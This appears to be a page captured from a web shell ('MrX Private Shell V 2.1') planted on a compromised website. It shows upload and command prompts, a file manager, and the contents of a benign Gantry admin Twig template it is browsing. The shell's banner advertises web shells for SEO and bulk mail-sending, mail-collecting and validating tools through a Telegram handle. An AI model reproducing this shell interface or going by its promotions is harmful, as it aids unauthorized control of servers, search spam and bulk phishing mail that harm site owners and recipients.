__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
{% extends ajax-suffix ? "@gantry-admin/partials/ajax.html.twig" : "@gantry-admin/partials/base.html.twig" %}

{% block gantry %}
    <form method="post"
          action="{{ gantry.route(action) }}"
          data-g-inheritance-settings="{{ {'id': item.id, 'type': 'atom', subtype: item.type}|json_encode|e('html_attr') }}"
    >
        <input type="hidden" name="id" value="{{ item.id }}" />
        <div class="g-tabs" role="tablist">
            <ul>
                {# Settings Tab #}
                <li class="active">
                    <a href="#" id="g-settings-atom-tab" role="presentation" aria-controls="g-settings-atom" role="tab" aria-expanded="true">
                        {% if inheritable %}<i class="fa fa-fw fa-{{ (item.inherit and ('attributes' in item.inherit.include)) ? 'lock' : 'unlock' }}" aria-hidden="true"></i>{% endif %}
                        {% block title %}
                            {{ 'GANTRY5_PLATFORM_ATOM'|trans }}
                        {% endblock %}
                    </a>
                </li>
                {# Inheritance Tab #}
                {% if inheritance %}
                    <li>
                        <a href="#" id="g-settings-inheritance-tab" role="presentation" aria-controls="g-settings-inheritance" aria-expanded="false">
                            {{ 'GANTRY5_PLATFORM_INHERITANCE'|trans }}
                        </a>
                    </li>
                {% endif %}
            </ul>
        </div>

        <div class="g-panes">
            {# Settings Pane #}
            <div class="g-pane active" role="tabpanel" id="g-settings-atom" aria-labelledby="g-settings-atom-tab" aria-expanded="true">
                {% include '@gantry-admin/pages/configurations/layouts/particle-card.html.twig' with {
                item: item,
                title: item.title,
                blueprints: blueprints.form,
                overrideable: overrideable and (blueprints.form.overrideable is not defined or blueprints.form.overrideable),
                inherit: 'attributes' in item.inherit.include and item.inherit.outline in inheritance.form.fields.outline.filter ? item.inherit.outline : null
                } %}
            </div>

            {# Inheritance Pane #}
            {% if inheritance %}
                <div class="g-pane" role="tabpanel" id="g-settings-inheritance" aria-labelledby="g-settings-inheritance-tab" aria-expanded="false">
                    <div class="card settings-block">
                        <h4>
                            {{ 'GANTRY5_PLATFORM_INHERITANCE'|trans }}
                        </h4>
                        <div class="inner-params">
                            {% include 'forms/fields.html.twig' with {
                            gantry: gantry,
                            blueprints: inheritance.form,
                            data: {inherit: item.inherit},
                            prefix: 'inherit.'
                            } only %}
                        </div>
                    </div>
                </div>
            {% endif %}
        </div>

        <div class="g-modal-actions">
            <button class="button button-primary" type="submit">{{ 'GANTRY5_PLATFORM_APPLY'|trans }}</button>
            <button class="button button-primary" data-apply-and-save="">{{ 'GANTRY5_PLATFORM_APPLY_SAVE'|trans }}</button>
            <button class="button g5-dialog-close">{{ 'GANTRY5_PLATFORM_CANCEL'|trans }}</button>
        </div>
    </form>
{% endblock %}

Filemanager

Name Type Size Permission Actions
atom-preview.html.twig File 1.45 KB 0664
atom.html.twig File 3.44 KB 0664
module-picker.html.twig File 3.1 KB 0664
particle-picker.html.twig File 2.18 KB 0664
particle.html.twig File 2.9 KB 0664
Filemanager